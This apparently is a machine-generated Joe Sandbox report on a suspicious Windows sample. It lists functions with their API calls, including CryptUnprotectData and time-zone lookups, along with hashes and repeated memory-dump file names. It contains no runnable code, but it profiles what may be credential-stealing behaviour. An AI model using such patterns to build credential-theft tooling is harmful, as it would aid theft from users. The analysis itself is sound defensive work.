                                • Opcode ID: 672db95b7b87835ab36b1e33e52a76ba4bb0747b5718fdd9231b2c0d7fd5c0e8
                                • Instruction ID: acedd55a963548b777af23dc34d1b83d89ba343109e36515648211215ae636b1
                                • Opcode Fuzzy Hash: 672db95b7b87835ab36b1e33e52a76ba4bb0747b5718fdd9231b2c0d7fd5c0e8
                                • Instruction Fuzzy Hash: 79110674200209EFDB00DF68D884FAA33E9EF89301F509988FA198B260DB35E841DB60
                                Function 00B79AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00B74EEE,00000000,?), ref: 00B79B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79B2A
                                • LocalFree.KERNEL32(?,?,?,?,00B74EEE,00000000,?), ref: 00B79B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: cb5d4385cf85a6e3f401bb8a89ae3bc1a52a880eaa1e4afebad3855c43aba932
                                • Instruction ID: 5645609ce1d707410575176cf6346ceea5abbcd2d21ec716f1ccd96a0b4d2161
                                • Opcode Fuzzy Hash: cb5d4385cf85a6e3f401bb8a89ae3bc1a52a880eaa1e4afebad3855c43aba932
                                • Instruction Fuzzy Hash: 2111A4B4240308EFEB10CF64DC95FAA77B5FB89700F208158F9199B390C775A901CB60
                                Function 00B87980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B90E00,00000000,?), ref: 00B879B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B879B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00B90E00,00000000,?), ref: 00B879C4
                                • wsprintfA.USER32 ref: 00B879F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 8dee41da7cf4994a9bbabc158567c707fa2292251216b2a45328953576cd379b
                                • Instruction ID: 728e71a7eff5daf3df34757add4b6cf05926d3ea83e8e5d374b1556dc544b101
                                • Opcode Fuzzy Hash: 8dee41da7cf4994a9bbabc158567c707fa2292251216b2a45328953576cd379b
                                • Instruction Fuzzy Hash: D11115B2904218EACB149FC9DD45BBEB7F8EB48B11F10425AF605A2290E6395940CBB1
                                Function 00B87A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0093DB90,00000000,?,00B90E10,00000000,?,00000000,00000000), ref: 00B87A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B87A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0093DB90,00000000,?,00B90E10,00000000,?,00000000,00000000,?), ref: 00B87A7D
                                • wsprintfA.USER32 ref: 00B87AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: d8386349bfe905f898a7b790fc00351fc740c98cd8c46741e24b2f741b4c475e
                                • Instruction ID: 53e5edd5ed7f931a844149596d46ae9895f400850650be71083904cd1becc389
                                • Opcode Fuzzy Hash: d8386349bfe905f898a7b790fc00351fc740c98cd8c46741e24b2f741b4c475e
                                • Instruction Fuzzy Hash: A91182B1945218EBDB149B58DC45F69B7B8FB04711F1043D6E51A932D0D7745E40CF51
                                Function 00F353ED Relevance: 5.3, Strings: 3, Instructions: 1584COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: |o[$U=/!$z>k
                                • API String ID: 0-1134408890
                                • Opcode ID: 808a85fd5ff8e27d2e441a32064143699c068a5843166a473c4f1b033c65a407
                                • Instruction ID: 6bfaaceee9b1542c8afeac7f658d4736c983393180c0b4f74e87d50ff7441e5a
                                • Opcode Fuzzy Hash: 808a85fd5ff8e27d2e441a32064143699c068a5843166a473c4f1b033c65a407
                                • Instruction Fuzzy Hash: 9BB2F5F390C2049FE304AE2DEC8577ABBE5EF94720F1A493DEAC483744EA3558158697
                                Function 00B83720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(00B8E118,00000000,00000001,00B8E108,00000000), ref: 00B83758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00B837B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: d396ba7f976e0cce98977827bc0e7ed8f1ae44e38c9527b261f013530238a855
                                • Instruction ID: c91ede6a941e83257807ec2e5d0e75dfc9b22cde2513db24aec32a8b673ef6eb
                                • Opcode Fuzzy Hash: d396ba7f976e0cce98977827bc0e7ed8f1ae44e38c9527b261f013530238a855
                                • Instruction Fuzzy Hash: 0841EA70A40A289FDB24DB58CC95B9BB7B5BB48702F4041D8E618E72E0D771AE85CF50
                                Function 00B79B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B79B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B79BA3
                                • LocalFree.KERNEL32(?), ref: 00B79BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 994ff98c1fbf3761ef8da4fae0c8cadf8b1b9024571e69e2d9485089aaee07c5
                                • Instruction ID: bc1eb2edd6fdc3f81e54d0da289d2d294a477312fdfa78710c6e909bdb5c8b6a
                                • Opcode Fuzzy Hash: 994ff98c1fbf3761ef8da4fae0c8cadf8b1b9024571e69e2d9485089aaee07c5
                                • Instruction Fuzzy Hash: A711BAB8A00209EFDB04DF98D985AAE77F5FF89300F108598E91597390D774AE10CF61
                                Function 00F30212 Relevance: 4.1, Strings: 2, Instructions: 1552COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: e}$x$
                                • API String ID: 0-3067363150
                                • Opcode ID: 659ace4e1e4f3074fa9a5412fa2ec0c64cd1bce1769e04aba0a9b6b612bde9a6
                                • Instruction ID: 6ccb5f0c0f849a2a88cac81e9f3d886f9f546198a76c09afa4aaeb195e9ccc75
                                • Opcode Fuzzy Hash: 659ace4e1e4f3074fa9a5412fa2ec0c64cd1bce1769e04aba0a9b6b612bde9a6
                                • Instruction Fuzzy Hash: 6BB204F39082049FE304AF2DEC8566ABBE5EB94720F1A493DEAC5D3744EA3558058787
                                Function 00F3F4DA Relevance: 4.1, Strings: 2, Instructions: 1552COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: vBF$"<}
                                • API String ID: 0-2469788779
                                • Opcode ID: b41bd8c9cbfa4a865ce1b9e572323df7e8900cf8d5d32c025bbc80f3806591b8
                                • Instruction ID: 32ad2075b023b8a666f973b57d3ca30ad7b880180ca263f0719cab2d1bb5ce89
                                • Opcode Fuzzy Hash: b41bd8c9cbfa4a865ce1b9e572323df7e8900cf8d5d32c025bbc80f3806591b8
                                • Instruction Fuzzy Hash: 2EB2E3F390C200AFE314AE29EC8567ABBE5EF94720F16893DEAC4C7344E63558158797
                                Function 00F4457A Relevance: 2.9, Strings: 1, Instructions: 1637COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *{
                                • API String ID: 0-308834529
                                • Opcode ID: 247080b3fff9f22f93ac6251cf3c5d95edfc1022ebffe9d6e448eb5b843a2017
                                • Instruction ID: fce724691046927cf599252396c83dc8046b3f61b33f0c862bbd6c01a9e5ebf0
                                • Opcode Fuzzy Hash: 247080b3fff9f22f93ac6251cf3c5d95edfc1022ebffe9d6e448eb5b843a2017
                                • Instruction Fuzzy Hash: B9B249F3A0C6049FE3046E2DEC8577ABBE9EF94720F164A3DEAC4C3744E93558058696
                                Function 00EAD028 Relevance: 2.7, Strings: 2, Instructions: 171COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !Y2_$JFkB
                                • API String ID: 0-1374303941
                                • Opcode ID: fcbc4810f48796017bd0dc1d041e356535b379086b779d9b1a71a46c098d9d9c
                                • Instruction ID: b80f28edca11bfd0a1aa929ed97bf72ec54789d500b2a9ec6d099105fcf6bce9
                                • Opcode Fuzzy Hash: fcbc4810f48796017bd0dc1d041e356535b379086b779d9b1a71a46c098d9d9c
                                • Instruction Fuzzy Hash: C15157B3E042189BE3109D2ADC8476AB697EBD4721F2BC63CDDC857B48ED795C058282
                                Function 00E689C3 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: iIg
                                • API String ID: 0-2654269806
                                • Opcode ID: 340717925fce2f10418f7e9807f5e358a42a62a9436565eaaef6a533d4a0455c
                                • Instruction ID: c46f260c4313990dcab450624291f8ad35487949454a8ba54f998f28c14a9581
                                • Opcode Fuzzy Hash: 340717925fce2f10418f7e9807f5e358a42a62a9436565eaaef6a533d4a0455c
                                • Instruction Fuzzy Hash: AB412AF3A182149BE3109E3EDC85767BBD6DBC4330F2B463DD988D7B84D53999068292
                                Function 00DDFF05 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
